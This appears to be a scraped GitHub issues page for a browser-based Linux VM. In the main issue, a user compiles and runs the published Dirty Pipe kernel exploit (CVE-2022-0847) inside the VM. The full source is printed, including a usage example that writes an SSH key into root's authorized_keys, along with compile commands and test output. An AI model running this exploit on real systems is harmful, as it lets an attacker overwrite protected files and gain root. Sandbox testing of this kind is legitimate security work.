               will instead write into the page cache, because of the
               PIPE_BUF_FLAG_CAN_MERGE flag */
            nbytes = write(p[1], data, data_size);
            if (nbytes < 0) {
                    perror("write failed");
                    return EXIT_FAILURE;
            if ((size_t)nbytes < data_size) {
                    fprintf(stderr, "short write\n");
                    return EXIT_FAILURE;
            printf("It worked!\n");
            return EXIT_SUCCESS;
    user@:~$ cat test.c | head -n 156 > test2.c
    user@:~$ cat test2.c 
    /* SPDX-License-Identifier: GPL-2.0 */
     * Copyright 2022 CM4all GmbH / IONOS SE
     * author: Max Kellermann <[email protected]>
     * Proof-of-concept exploit for the Dirty Pipe
     * vulnerability (CVE-2022-0847) caused by an uninitialized
     * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
     * file contents in the page cache, even if the file is not permitted
     * to be written, immutable or on a read-only mount.
     * This exploit requires Linux 5.8 or later; the code path was made
     * reachable by commit f6dd975583bd ("pipe: merge
     * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
     * there before, it just provided an easy way to exploit it.
     * There are two major limitations of this exploit: the offset cannot
     * be on a page boundary (it needs to write one byte before the offset
     * to add a reference to this page to the pipe), and the write cannot
     * cross a page boundary.
     * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
     * Further explanation: https://dirtypipe.cm4all.com/
    #define _GNU_SOURCE
    #include <unistd.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/stat.h>
    #include <sys/user.h>
    #ifndef PAGE_SIZE
    #define PAGE_SIZE 4096
     * Create a pipe where all "bufs" on the pipe_inode_info ring have the
     * PIPE_BUF_FLAG_CAN_MERGE flag set.
    static void prepare_pipe(int p[2])
            if (pipe(p)) abort();
            const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
            static char buffer[4096];
            /* fill the pipe completely; each pipe_buffer will now have
               the PIPE_BUF_FLAG_CAN_MERGE flag */
            for (unsigned r = pipe_size; r > 0;) {
                    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                    write(p[1], buffer, n);
                    r -= n;
            /* drain the pipe, freeing all pipe_buffer instances (but
               leaving the flags initialized) */
            for (unsigned r = pipe_size; r > 0;) {
                    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
                    read(p[0], buffer, n);
                    r -= n;
            /* the pipe is now empty, and if somebody adds a new
               pipe_buffer without initializing its "flags", the buffer
               will be mergeable */
    int main(int argc, char **argv)
            if (argc != 4) {
                    fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
                    return EXIT_FAILURE;
            /* dumb command-line argument parser */
            const char *const path = argv[1];
            loff_t offset = strtoul(argv[2], NULL, 0);
            const char *const data = argv[3];
            const size_t data_size = strlen(data);
            if (offset % PAGE_SIZE == 0) {
                    fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
                    return EXIT_FAILURE;
            const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
            const loff_t end_offset = offset + (loff_t)data_size;
            if (end_offset > next_page) {
                    fprintf(stderr, "Sorry, cannot write across a page boundary\n");
                    return EXIT_FAILURE;
            /* open the input file and validate the specified offset */
            const int fd = open(path, O_RDONLY); // yes, read-only! :-)
            if (fd < 0) {
                    perror("open failed");
                    return EXIT_FAILURE;
            struct stat st;
            if (fstat(fd, &st)) {
                    perror("stat failed");
                    return EXIT_FAILURE;
            if (offset > st.st_size) {
                    fprintf(stderr, "Offset is not inside the file\n");
                    return EXIT_FAILURE;
            if (end_offset > st.st_size) {
                    fprintf(stderr, "Sorry, cannot enlarge the file\n");
                    return EXIT_FAILURE;
            /* create the pipe with all flags initialized with
               PIPE_BUF_FLAG_CAN_MERGE */
            int p[2];
            /* splice one byte from before the specified offset into the
               pipe; this will add a reference to the page cache, but
               since copy_page_to_iter_pipe() does not initialize the
               "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
            ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
            if (nbytes < 0) {
                    perror("splice failed");
                    return EXIT_FAILURE;
            if (nbytes == 0) {
                    fprintf(stderr, "short splice\n");
                    return EXIT_FAILURE;
            /* the following write will not create a new pipe_buffer, but
               will instead write into the page cache, because of the
               PIPE_BUF_FLAG_CAN_MERGE flag */
            nbytes = write(p[1], data, data_size);
            if (nbytes < 0) {
                    perror("write failed");
                    return EXIT_FAILURE;
            if ((size_t)nbytes < data_size) {
                    fprintf(stderr, "short write\n");
                    return EXIT_FAILURE;
            printf("It worked!\n");
            return EXIT_SUCCESS;
    user@:~$ gcc -Wall -Wextra test2.c 
    user@:~$ ls
    a.out  examples  test.c  test2.c
    user@:~$ file a.out 
    a.out: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=11ad260aed4e48530daf8f81b93e156d5688f3dc, not stripped
    user@:~$ ls
    a.out  examples  test.c  test2.c
    user@:~$ ./a.out 
    user@:~$ ls /etc/
    adduser.conf            deluser.conf  ld.so.cache     modules-load.d  python3.7     shadow-
    alternatives            dhcp          ld.so.conf      motd            rc0.d         shells
    apache2                 dpkg          ld.so.conf.d    nanorc          rc1.d         skel
    apt                     environment   libaudit.conf   network         rc2.d         ssl
    bash.bashrc             fstab         lighttpd        networks        rc3.d         subgid
    bindresvport.blacklist  gai.conf      localtime       nsswitch.conf   rc4.d         subgid-
    binfmt.d                group         logcheck        opt             rc5.d         subuid
    ca-certificates         group-        login.defs      os-release      rc6.d         subuid-
    ca-certificates.conf    gshadow       logrotate.conf  pam.conf        rcS.d         sysctl.conf
    calendar                gshadow-      logrotate.d     pam.d           resolv.conf   sysctl.d
    cron.d                  host.conf     machine-id      passwd          rmt           systemd
    cron.daily              hostname      magic           passwd-         rpc           terminfo
    cron.hourly             hosts         magic.mime      perl            rsyslog.conf  timezone
    cron.monthly            init.d        mailcap         profile         rsyslog.d     tmpfiles.d
    cron.weekly             inputrc       mailcap.order   profile.d       securetty     udev
    crontab                 iproute2      mime.types      protocols       security      update-motd.d
    debconf.conf            issue         mke2fs.conf     python          selinux       vim
    debian_version          issue.net     modprobe.d      python2.7       services      xattr.conf
    default                 kernel        modules         python3         shadow        xdg
    user@:~$ ls /etc/
    adduser.conf            deluser.conf  ld.so.cache     modules-load.d  python3.7     shadow-
    alternatives            dhcp          ld.so.conf      motd            rc0.d         shells
    apache2                 dpkg          ld.so.conf.d    nanorc          rc1.d         skel
    apt                     environment   libaudit.conf   network         rc2.d         ssl
    bash.bashrc             fstab         lighttpd        networks        rc3.d         subgid
    bindresvport.blacklist  gai.conf      localtime       nsswitch.conf   rc4.d         subgid-
    binfmt.d                group         logcheck        opt             rc5.d         subuid
    ca-certificates         group-        login.defs      os-release      rc6.d         subuid-
    ca-certificates.conf    gshadow       logrotate.conf  pam.conf        rcS.d         sysctl.conf
    calendar                gshadow-      logrotate.d     pam.d           resolv.conf   sysctl.d
    cron.d                  host.conf     machine-id      passwd          rmt           systemd
    cron.daily              hostname      magic           passwd-         rpc           terminfo
    cron.hourly             hosts         magic.mime      perl            rsyslog.conf  timezone
    cron.monthly            init.d        mailcap         profile         rsyslog.d     tmpfiles.d
    cron.weekly             inputrc       mailcap.order   profile.d       securetty     udev
    crontab                 iproute2      mime.types      protocols       security      update-motd.d
    debconf.conf            issue         mke2fs.conf     python          selinux       vim
    debian_version          issue.net     modprobe.d      python2.7       services      xattr.conf
    default                 kernel        modules         python3         shadow        xdg
    user@:~$ ls -a /etc/
    Display all 115 possibilities? (y or n)
    .pwd.lock               gshadow-                modules-load.d/         rmt
    adduser.conf            host.conf               motd                    rpc
    alternatives/           hostname                nanorc                  rsyslog.conf
    apache2/                hosts                   network/                rsyslog.d/
    apt/                    init.d/                 networks                securetty
    bash.bashrc             inputrc                 nsswitch.conf           security/
    bindresvport.blacklist  iproute2/               opt/                    selinux/
    binfmt.d/               issue                   os-release              services
    ca-certificates/        issue.net               pam.conf                shadow
    ca-certificates.conf    kernel/                 pam.d/                  shadow-
    calendar/               ld.so.cache             passwd                  shells
    cron.d/                 ld.so.conf              passwd-                 skel/
    cron.daily/             ld.so.conf.d/           perl/                   ssl/
    cron.hourly/            libaudit.conf           profile                 subgid
    cron.monthly/           lighttpd/               profile.d/              subgid-
    cron.weekly/            localtime               protocols               subuid
    crontab                 logcheck/               python/                 subuid-
    debconf.conf            login.defs              python2.7/              sysctl.conf
    debian_version          logrotate.conf          python3/                sysctl.d/
    default/                logrotate.d/            python3.7/              systemd/
    deluser.conf            machine-id              rc0.d/                  terminfo/
    dhcp/                   magic                   rc1.d/                  timezone
    dpkg/                   magic.mime              rc2.d/                  tmpfiles.d/
    environment             mailcap                 rc3.d/                  udev/
    fstab                   mailcap.order           rc4.d/                  update-motd.d/
    gai.conf                mime.types              rc5.d/                  vim/
    group                   mke2fs.conf             rc6.d/                  xattr.conf
    group-                  modprobe.d/             rcS.d/                  xdg/
    gshadow                 modules                 resolv.conf             
    user@:~$ ls -lah /etc/
    total 0
    -rw------- 0 user user    0 Sep 17  2021 .pwd.lock
    -rw-r--r-- 0 user user 3.0K Sep 17  2021 adduser.conf
    drwxr-xr-x 0 user user 4.0K Jan 31  2022 alternatives
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 apache2
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 apt
    -rw-r--r-- 0 user user 2.0K Apr 18  2019 bash.bashrc
    -rw-r--r-- 0 user user  367 Mar  2  2018 bindresvport.blacklist
    drwxr-xr-x 0 user user 4.0K Mar 18  2021 binfmt.d
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 ca-certificates
    -rw-r--r-- 0 user user 5.9K Sep 17  2021 ca-certificates.conf
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 calendar
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 cron.d
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 cron.daily
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 cron.hourly
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 cron.monthly
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 cron.weekly
    -rw-r--r-- 0 user user 1.1K Oct 11  2019 crontab
    -rw-r--r-- 0 user user 2.9K Feb 26  2019 debconf.conf
    -rw-r--r-- 0 user user    6 Oct  3  2021 debian_version
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 default
    -rw-r--r-- 0 user user  604 Jun 26  2016 deluser.conf
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 dhcp
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 dpkg
    -rw-r--r-- 0 user user    0 Sep 17  2021 environment
    -rw-r--r-- 0 user user   37 Sep 17  2021 fstab
    -rw-r--r-- 0 user user 2.6K Aug  1  2018 gai.conf
    -rw-r--r-- 0 user user  619 Sep 17  2021 group
    -rw-r--r-- 0 user user  606 Sep 17  2021 group-
    -rw-r----- 0 user user  516 Sep 17  2021 gshadow
    -rw-r----- 0 user user  507 Sep 17  2021 gshadow-
    -rw-r--r-- 0 user user    9 Aug  7  2006 host.conf
    -rw-r--r-- 0 user user    7 Sep 17  2021 hostname
    -rw-r--r-- 0 user user  109 Sep 17  2021 hosts
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 init.d
    -rw-r--r-- 0 user user 1.8K May  5  2018 inputrc
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 iproute2
    -rw-r--r-- 0 user user   27 Jun 13  2021 issue
    -rw-r--r-- 0 user user   20 Jun 13  2021 issue.net
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 kernel
    -rw-r--r-- 0 user user  19K Jan 31  2022 ld.so.cache
    -rw-r--r-- 0 user user   34 Mar  2  2018 ld.so.conf
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 ld.so.conf.d
    -rw-r--r-- 0 user user  191 Apr 25  2019 libaudit.conf
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 lighttpd
    lrwxrwxrwx 0 user user   27 Jan 28  2022 localtime -> /usr/share/zoneinfo/Etc/UTC
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 logcheck
    -rw-r--r-- 0 user user  11K Jul 27  2018 login.defs
    -rw-r--r-- 0 user user  435 Aug 22  2018 logrotate.conf
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 logrotate.d
    -r--r--r-- 0 user user   33 Sep 17  2021 machine-id
    -rw-r--r-- 0 user user  111 Jan 25  2021 magic
    -rw-r--r-- 0 user user  111 Jan 25  2021 magic.mime
    -rw-r--r-- 0 user user 2.6K Jan 28  2022 mailcap
    -rw-r--r-- 0 user user  449 Feb  9  2019 mailcap.order
    -rw-r--r-- 0 user user  24K Feb  9  2019 mime.types
    -rw-r--r-- 0 user user  812 Jan 10  2020 mke2fs.conf
    drwxr-xr-x 0 user user 4.0K Feb  9  2019 modprobe.d
    -rw-r--r-- 0 user user  195 Sep 17  2021 modules
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 modules-load.d
    -rw-r--r-- 0 user user  286 Jun 13  2021 motd
    -rw-r--r-- 0 user user 9.1K Jun 12  2019 nanorc
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 network
    -rw-r--r-- 0 user user   60 Sep 17  2021 networks
    -rw-r--r-- 0 user user  494 Feb 10  2019 nsswitch.conf
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 opt
    lrwxrwxrwx 0 user user   21 Oct  3  2021 os-release -> ../usr/lib/os-release
    -rw-r--r-- 0 user user  552 Feb 14  2019 pam.conf
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 pam.d
    -rw-r--r-- 0 user user 1.2K Sep 17  2021 passwd
    -rw-r--r-- 0 user user 1.2K Sep 17  2021 passwd-
    drwxr-xr-x 0 user user 4.0K Jan 31  2022 perl
    -rw-r--r-- 0 user user  767 Mar  4  2016 profile
    drwxr-xr-x 0 user user 4.0K Jun 13  2021 profile.d
    -rw-r--r-- 0 user user 2.9K Feb 10  2019 protocols
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 python
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 python2.7
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 python3
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 python3.7
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 rc0.d
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 rc1.d
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 rc2.d
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 rc3.d
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 rc4.d
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 rc5.d
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 rc6.d
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 rcS.d
    -rw-r--r-- 0 user user  738 Sep 17  2021 resolv.conf
    lrwxrwxrwx 0 user user   13 Apr 23  2019 rmt -> /usr/sbin/rmt
    -rw-r--r-- 0 user user  887 Feb 10  2019 rpc
    -rw-r--r-- 0 user user 2.0K Feb 26  2019 rsyslog.conf
    drwxr-xr-x 0 user user 4.0K Feb 26  2019 rsyslog.d
    -rw-r--r-- 0 user user 4.1K Jul 27  2018 securetty
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 security
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 selinux
    -rw-r--r-- 0 user user  19K Feb 10  2019 services
    -rw-r----- 0 user user  639 Sep 17  2021 shadow
    -rw-r----- 0 user user  613 Sep 17  2021 shadow-
    -rw-r--r-- 0 user user  116 Sep 17  2021 shells
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 skel
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 ssl
    -rw-r--r-- 0 user user   18 Sep 17  2021 subgid
    -rw-r--r-- 0 user user    0 Sep 17  2021 subgid-
    -rw-r--r-- 0 user user   18 Sep 17  2021 subuid
    -rw-r--r-- 0 user user    0 Sep 17  2021 subuid-
    -rw-r--r-- 0 user user 2.3K May 31  2018 sysctl.conf
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 sysctl.d
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 systemd
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 terminfo
    -rw-r--r-- 0 user user    8 Jan 28  2022 timezone
    drwxr-xr-x 0 user user 4.0K Mar 18  2021 tmpfiles.d
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 udev
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 update-motd.d
    drwxr-xr-x 0 user user 4.0K Sep 17  2021 vim
    -rw-r--r-- 0 user user  642 Mar  1  2019 xattr.conf
    drwxr-xr-x 0 user user 4.0K Jan 28  2022 xdg
    user@:~$ find /usr -uid 0
    user@:~$ ls
    a.out  examples  test.c  test2.c
    user@:~$ echo abc>n
    user@:~$ ./a.out 
    user@:~$ ./a.out abc 1 d
    open failed: No such file or directory
    user@:~$ ./a.out n 1 d
    opened by hello-smile6 0
  • Empty /proc filesystem; causes ps, pgrep, etc. commands not working

    Empty /proc filesystem; causes ps, pgrep, etc. commands not working

    Currently, /proc filesystem is empty. This means that we cannot run "ps" (and various other process related application such as pgrep, killall, fuser, ...) now.

    Type: feature request 
    opened by rigarash 2
Leaning Technologies Ltd
Compile-to-WebAssembly and compile-to-JavaScript solutions
Leaning Technologies Ltd
Easy server-side and client-side validation for FormData, URLSearchParams and JSON data in your Fresh app 🍋

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